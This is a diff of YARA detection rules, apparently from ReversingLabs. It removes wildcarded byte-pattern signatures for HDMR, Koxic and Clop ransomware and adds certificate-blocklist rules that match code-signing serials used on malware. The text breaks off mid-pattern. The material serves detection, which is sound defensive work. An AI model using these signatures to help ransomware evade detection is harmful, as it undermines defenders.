"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "035c6596db8dc14a663679c1f7e682b85963927cc034b01e390cc22fdee3334a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12330-L12348" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9b678e9fb1e1eda3ac8e027b5e449af446de4379fea46ef7ff820240c73795ee" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "HDMR" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? - ?? ?? 53 56 8B 75 ?? 57 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 89 74 24 ?? - 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? - ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB - ?? 8D 49 ?? 8B 74 24 ?? F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24 ?? - 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 - ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? - 8D 44 24 ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 - C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D - } - $find_files_p2 = { - 54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 - ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4C 24 - ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 54 24 - ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 44 24 - ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 68 - ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 54 24 ?? 68 ?? ?? - ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D - 8C 24 ?? ?? ?? ?? 51 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 - 56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 - E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83 - C4 ?? 85 F6 74 ?? 8B 44 24 ?? 8D 54 24 ?? 52 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? - 8B 0D ?? ?? ?? ?? 83 C4 ?? 3B 0D ?? ?? ?? ?? 7C ?? 8D 49 ?? 6A ?? FF 15 ?? ?? ?? ?? - 8B 15 ?? ?? ?? ?? 3B 15 ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? FF D7 FF 05 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF D3 6A ?? 6A ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF - 15 ?? ?? ?? ?? 8B 74 24 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? - ?? 56 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D - C3 - } - $encrypt_files_p1 = { - 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? - ?? ?? 53 56 57 33 C0 8B D9 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 89 5C 24 ?? 66 - 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A - ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 66 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? BF ?? ?? - ?? ?? 33 F6 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? - ?? 83 C6 ?? 83 C7 ?? 81 FE ?? ?? ?? ?? 72 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? - 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51 - 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 8C ?? ?? ?? ?? 8B - 7C 24 ?? 7F ?? 83 FF ?? 0F 82 ?? ?? ?? ?? 8B F0 89 7C 24 ?? 89 74 24 ?? 85 C0 7C ?? - 7F ?? 83 FF ?? 76 ?? 6A ?? 6A ?? 6A ?? 53 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 33 C0 50 8D 54 24 ?? 52 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 88 44 24 ?? 6A ?? 8D - 44 24 ?? 50 53 C6 44 24 ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B C7 83 E8 - ?? 8B CE 83 D9 ?? 33 F6 39 44 24 ?? 75 ?? 3B F1 75 ?? 8B 4C 24 ?? 3B 0D ?? ?? ?? ?? - 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 6A ?? 52 C6 44 - } - $encrypt_files_p2 = { - 24 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D ?? - ?? ?? ?? 40 88 44 34 ?? 46 83 FE ?? 7C ?? 8B 44 24 ?? BE ?? ?? ?? ?? 85 C0 0F 8F ?? - ?? ?? ?? 0F 8C ?? ?? ?? ?? 81 FF ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 85 C0 0F 8C ?? ?? ?? - ?? 7F ?? 85 FF 0F 84 ?? ?? ?? ?? 85 C0 7F ?? 7C ?? 3B FE 73 ?? 6A ?? 6A ?? 50 57 E8 - ?? ?? ?? ?? 8B F7 2B F0 56 E8 ?? ?? ?? ?? 8B F8 33 C0 83 C4 ?? 89 44 24 ?? 89 44 24 - ?? 3B F8 74 ?? 50 8D 44 24 ?? 50 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 74 24 ?? - 75 ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 56 57 8D 44 24 ?? E8 ?? ?? ?? ?? 83 C4 - ?? 6A ?? 8D 4C 24 ?? 51 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 - ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? - ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 - C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 68 ?? ?? - ?? ?? 50 57 E8 ?? ?? ?? ?? 8B C8 89 44 24 ?? B8 ?? ?? ?? ?? F7 E9 C1 FA ?? 8B C2 C1 - E8 ?? 03 C2 69 C0 ?? ?? ?? ?? 8B D1 2B D0 85 D2 7E ?? 41 89 4C 24 ?? 33 C0 89 44 24 - ?? 3B C8 0F 8E ?? ?? ?? ?? 89 44 24 ?? EB ?? 90 8B 7C 24 ?? 8B 44 24 ?? 8B 4C 24 - } - $encrypt_files_p3 = { - 99 2B F8 1B CA 89 7C 24 ?? 89 4C 24 ?? 0F 88 ?? ?? ?? ?? 7F ?? 85 FF 0F 84 ?? ?? ?? - ?? 8B C6 99 3B CA 7F ?? 7C ?? 3B F8 73 ?? 6A ?? 6A ?? 51 57 E8 ?? ?? ?? ?? 8B F7 2B - F0 85 F6 0F 8E ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 33 C0 83 C4 ?? 89 44 24 ?? 89 44 - 24 ?? 3B F8 0F 84 ?? ?? ?? ?? 50 8D 44 24 ?? 50 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F - 84 ?? ?? ?? ?? 39 74 24 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 8B CE F7 D9 51 53 FF 15 ?? - ?? ?? ?? 56 57 8D 44 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 52 56 57 53 FF - 15 ?? ?? ?? ?? 85 C0 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 81 FE ?? ?? ?? ?? 7C ?? 83 7C - 24 ?? ?? 7C ?? 7F ?? 81 7C 24 ?? ?? ?? ?? ?? 72 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF - 15 ?? ?? ?? ?? 8B 44 24 ?? 81 44 24 ?? ?? ?? ?? ?? 40 89 44 24 ?? 3B 44 24 ?? 0F 8C - ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ?? ?? 85 FF 74 ?? 57 E8 - ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 68 - } - $encrypt_files_p4 = { - 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D - 74 24 ?? 8D BC 24 ?? ?? ?? ?? F3 A5 8B 4C 24 ?? 6A ?? 89 8C 24 ?? ?? ?? ?? 8B D0 8D - 4C 24 ?? 51 C1 FA ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? A1 ?? - ?? ?? ?? 52 53 C7 44 24 ?? ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF - 15 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 66 89 84 24 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 94 24 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 5F 5E - 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 8B 8C - 24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $find_MS_xchange_backups_p1 = { - 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? - ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? - 8B 1D ?? ?? ?? ?? B0 ?? 88 44 24 ?? 88 44 24 ?? B0 ?? 83 C4 ?? C6 44 24 ?? ?? C7 44 - 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? 88 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? C6 44 24 ?? ?? 88 44 24 - ?? 88 44 24 ?? BE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B FF 68 ?? ?? ?? ?? 8D 8C 24 - ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 54 24 ?? - 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 6A ?? 51 - E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 33 D2 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? - 8D 44 24 ?? 50 8D 4C 24 ?? 51 52 52 52 52 52 52 66 89 54 24 ?? 8D 94 24 ?? ?? ?? ?? - 52 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D3 6A ?? FF D7 83 C6 ?? - FF 4C 24 ?? 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8D 49 ?? - 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 C6 84 24 ?? ?? ?? ?? ?? E8 - } - $find_MS_xchange_backups_p2 = { - 83 C4 ?? 56 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 6A - ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 33 C9 8D 54 24 ?? 52 89 44 24 - ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 51 51 51 51 51 51 66 89 4C 24 - ?? 8D 8C 24 ?? ?? ?? ?? 51 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF - D3 6A ?? FF D7 83 C6 ?? FF 4C 24 ?? 0F 85 ?? ?? ?? ?? 33 D2 68 ?? ?? ?? ?? 52 8D 84 - 24 ?? ?? ?? ?? 50 66 89 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 B1 ?? EB ?? 8D 49 ?? - 30 88 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? - 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? - ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 56 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ?? - ?? ?? 83 C4 ?? 33 C0 8D 4C 24 ?? 51 8D 54 24 ?? 52 50 50 50 50 50 50 89 44 24 ?? 89 - 44 24 ?? 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 50 6A ?? C7 44 - 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D3 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC - E8 ?? ?? ?? ?? 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($find_MS_xchange_backups_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMCERT,LLC" and (pe.signatures[i].serial=="00:bc:6a:18:12:e0:01:36:24:69:54:11:08:97:3b:bd:52" or pe.signatures[i].serial=="bc:6a:18:12:e0:01:36:24:69:54:11:08:97:3b:bd:52") and 1623801600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Koxic : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Bde1D6Dc3622724F427A39E6A34F5124 : INFO FILE { meta: - description = "Yara rule that detects Koxic ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "73c4afb0-cfa8-5bc5-bca3-49a7710f4ab9" - date = "2022-04-21" - modified = "2022-04-21" + id = "6b6958c0-3b43-5c17-9354-d0e2326b97fd" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Koxic.yara#L1-L87" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "739faf047b95fd538422a42943fcaad6538549bf4cf33ed91385c61365af4f09" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12350-L12368" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f1cf0b6855269a771447a0b38f4a02996b6527d7df4b143b69598ed591719ca0" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Koxic" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $enum_shares_p1 = { - 8B 45 ?? 50 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 55 ?? 52 8B 45 ?? 50 8D 4D - ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B - 55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? C1 - E1 ?? 8B 55 ?? 8B 44 0A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? - ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B - } - $enum_shares_p2 = { - 54 01 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? - 0F B6 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - 51 FF 15 ?? ?? ?? ?? 83 E8 ?? 89 45 ?? EB ?? 8B 55 ?? 83 EA ?? 89 55 ?? 83 7D ?? ?? - 0F 8C ?? ?? ?? ?? 8B 45 ?? 0F B7 8C 45 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55 - ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? C6 45 ?? ?? EB ?? 8B 4D ?? 8D 94 4D ?? ?? - ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C9 8B 55 ?? 66 89 8C 55 ?? ?? FF - FF 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 - ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 - ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 EA ?? 89 - 55 ?? E9 ?? ?? ?? ?? EB ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ?? 83 E2 ?? 74 ?? 8B - 45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 - ?? C1 E0 ?? 03 45 ?? B9 ?? ?? ?? ?? 6B D1 ?? 89 44 15 ?? B8 ?? ?? ?? ?? C1 E0 ?? 8B - 4D ?? 89 4C 05 ?? BA ?? ?? ?? ?? D1 E2 8B 45 ?? 89 44 15 ?? 8D 4D ?? 51 E8 ?? ?? ?? - ?? 83 C4 ?? E9 ?? ?? ?? ?? EB ?? 81 7D ?? ?? ?? ?? ?? 74 ?? EB ?? 81 7D ?? ?? ?? ?? - ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 - C0 75 ?? B8 ?? ?? ?? ?? EB ?? 33 C0 - } - $find_files = { - 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 33 D2 8B 45 ?? 66 89 10 - 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 C0 83 F8 ?? 75 ?? E9 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 44 02 ?? 3D ?? ?? ?? ?? - 72 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 8B - 48 ?? 81 79 ?? ?? ?? ?? ?? 76 ?? 6A ?? FF 15 ?? ?? ?? ?? EB ?? 8B 95 ?? ?? ?? ?? 83 - E2 ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8B 0D ?? ?? ?? ?? 51 - FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 0D - ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? C1 E2 ?? 8B 45 ?? 89 44 15 ?? 8D 4D - ?? 51 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 - C0 75 ?? 6A ?? A1 - } - $encrypt_files = { - 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7F ?? 7C ?? 83 7D ?? ?? 73 ?? - E9 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 4D ?? 2B C8 8B - 45 ?? 1B C2 89 4D ?? 89 45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 8B 45 ?? 50 - FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 72 ?? - 81 7D ?? ?? ?? ?? ?? 73 ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51 FF - 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? - ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? - EB ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 - 45 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ( all of ($enum_shares_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMCERT,LLC" and (pe.signatures[i].serial=="00:bd:e1:d6:dc:36:22:72:4f:42:7a:39:e6:a3:4f:51:24" or pe.signatures[i].serial=="bd:e1:d6:dc:36:22:72:4f:42:7a:39:e6:a3:4f:51:24") and 1628553600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Clop : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_5C9F5F96726A6E6Fc3B8Bb153Ac82Af2 : INFO FILE { meta: - description = "Yara rule that detects Clop ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0ea63119-3773-5404-b332-8e3966fd35df" - date = "2020-07-15" - modified = "2020-07-15" + id = "f7619c39-33a0-5f99-b911-9d8a61a4683d" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Clop.yara#L1-L109" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0b63db16a4b1cae27a97d0ff9df692a63f1a11120ffac69c05a5c71fbd224007" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12370-L12386" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a61bcc4a90a75a429366e3f93929005b67325eccc6cad3df6b7a0c3692597828" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Clop" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 6A ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? - 83 C4 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 BD ?? - ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? - ?? ?? FF 15 ?? ?? ?? 